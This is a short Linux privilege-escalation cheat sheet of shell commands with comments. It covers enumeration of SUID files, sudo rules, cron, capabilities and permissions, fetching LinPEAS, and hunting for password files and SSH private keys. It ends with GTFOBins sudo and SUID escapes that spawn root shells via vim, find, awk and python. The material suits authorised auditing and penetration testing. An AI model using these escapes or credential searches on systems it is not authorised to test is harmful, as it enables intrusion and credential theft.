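% privesc, linux, escalation

# Audit SUID binaries (setuid bit set); diff against a known-good baseline for the host
find / -perm -4000 -type f 2>/dev/null

# Audit SGID binaries (setgid bit set)
find / -perm -2000 -type f 2>/dev/null

# List the sudo rules that apply to the current user (may prompt for a password)
sudo -l

# Find directories writable by the current user
find / -writable -type d 2>/dev/null

# Find world-writable regular files
find / -perm -o+w -type f 2>/dev/null

# Review the system-wide crontab
cat /etc/crontab

# Review cron drop-in directories and their permissions
ls -la /etc/cron*

# List the current user's own crontab only (other users' crontabs are not shown here)
crontab -l

# List files carrying file capabilities
getcap -r / 2>/dev/null

# Check docker group membership by group name (matching on the raw id line also hits usernames containing "docker")
id -nG | grep -w docker

# Kernel release and build string, to match against vendor security advisories
uname -a

# OS / distribution release information
cat /etc/os-release

# LinPEAS: fetch to a file, verify SHA-256 against a checksum obtained out-of-band (replace the placeholder), review, then run; never pipe a remote script straight into sh
curl -fsSL -o linpeas.sh https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh \
  && printf '%s  linpeas.sh\n' 'REPLACE_WITH_EXPECTED_SHA256' | sha256sum -c - \
  && sh linpeas.sh

# LinEnum: run a locally reviewed copy in thorough mode
./LinEnum.sh -t

# Check /etc/passwd permissions (must not be writable by non-root users)
ls -la /etc/passwd

# Check /etc/shadow permissions (must not be readable by non-root users)
ls -la /etc/shadow

# Search .txt files for the string "password" (one grep per batch of files rather than one per file)
find / -name "*.txt" -exec grep -l -- password {} + 2>/dev/null

# Review NFS exports for no_root_squash
cat /etc/exports

# Find private SSH keys named id_rsa
find / -name "id_rsa" 2>/dev/null

# Find authorized_keys files
find / -name "authorized_keys" 2>/dev/null

# Print PATH (quoted; any writable or relative entry is a PATH-hijacking risk)
printf '%s\n' "$PATH"

# Inspect /usr/local/bin contents and permissions
ls -la /usr/local/bin

# GTFOBins sudo bypass - vim (only relevant if sudo -l grants vim)
sudo vim -c ':!/bin/sh'

# GTFOBins sudo bypass - find (only relevant if sudo -l grants find)
sudo find . -exec /bin/sh \; -quit

# GTFOBins sudo bypass - awk (only relevant if sudo -l grants awk)
sudo awk 'BEGIN {system("/bin/sh")}'

# GTFOBins SUID - python (only relevant if the python binary is SUID)
./python -c 'import os; os.execl("/bin/sh", "sh", "-p")'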